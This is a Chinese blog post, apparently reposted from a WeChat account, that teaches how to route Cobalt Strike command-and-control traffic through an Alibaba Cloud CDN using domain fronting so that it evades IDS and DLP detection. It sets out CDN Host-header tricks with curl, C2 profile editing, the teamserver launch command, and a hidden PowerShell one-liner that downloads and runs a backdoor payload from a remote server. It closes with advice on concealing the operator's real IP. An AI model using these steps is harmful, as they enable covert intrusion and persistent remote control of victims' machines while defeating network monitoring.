由于传播、利用此文所提供的信息而造成的任何直接或间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任

域前置简介

域前置（Domain Fronting）基于HTTPS通用规避技术，也被称为域前端网络攻击技术。

这是一种用来隐藏Metasploit、Cobalt Strike等团队控制服务器流量，以此来一定程度绕过检查器或防火墙检测的技术。

域前置技术原理（CDN分发）

通过CDN节点将流量转发到真实的C2服务器，其中CDN节点IP通过识别请求的HOST头进行流量转发，利用我们配置域名的高可信度，如我们可以设置一个微软的子域名，可以有效的躲避DLP、agent等流量检测。

域前置的核心是CDN

CDN工作原理：

同一个IP可以被不同的域名进行绑定加速，例如现在有两个网站分别为www.abc.com和www.zxc.com都指定同一个IP：111.111.111.111(CDN服务器)；浏览器通过HTTP请求包里的HOST头域名进行精确访问www.abc.com还是访问www.zxc.com

比如我们ping www.xxxx.com

得到IP：1.81.2.59

通过IP反查域名,可以看到很多域名绑定在这个IP上，这个就是CDN

www.3636.com和www.youka.la都是这个CDN服务器下的域名

通过curl访问网页，可以看到HOST头域名

curl -v www.3636.com



指定HOST
curl 1.81.2.59 -H "host:www.3636.com" -v

可以看到，依然可以访问到



归根结底一句话：CDN是通过HOST来判断你要访问那个网站的
当访问www.3636.com这个域名的时候，实际上也是访问同一个CDN服务器，它的IP也是1.81.2.59
此处把IP替换为www.youka.la依然可以访问，并且内容一致





因为CND服务器可以达到隐藏真实IP的效果，所以C2服务器的真实IP可以得到隐藏保护。
域前置操作


备案域名1个


免费SSL申请：https://help.aliyun.com/document_detail/156645.html?spm=a2c6h.12873639.0.0.52105de0zFR8Tc&source=5176.11533457&userCode=r3yteowb


阿里云CDN控制中心：https://cdn.console.aliyun.com/overview


设置CDN


解析设置



CDN设置



多地ping测试，可以看到多个IP



配置Cobalt Strike
修改C2的profile配置文件
下载C2：https://github.com/xx0hcd/Malleable-C2-Profiles
选择合适的profile文件，修改HOST头为准备好的域名（get和post都要改）
可以CTRL+F 然后全部替换



用c2lint检查一下
./c2lint cdn.profile



VPS开启teamserver
nohup ./teamserver xxx.xx.xx.99 qweqweqwe999 cdn.profile

nohub表示不挂断的运行命令，不然shell断了CS也会连接不上


kali上启动Cobalt Strike


开启监听


生成后门
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://1xx.xx.xx.99:8080/a'))"

实际使用中，不能直接把真实IP暴露出来，应该另存为网页，通过其他IP进行访问


成功加密



原文始发于微信公众号（Nurburgring）：域前置Cobalt Strike逃避IDS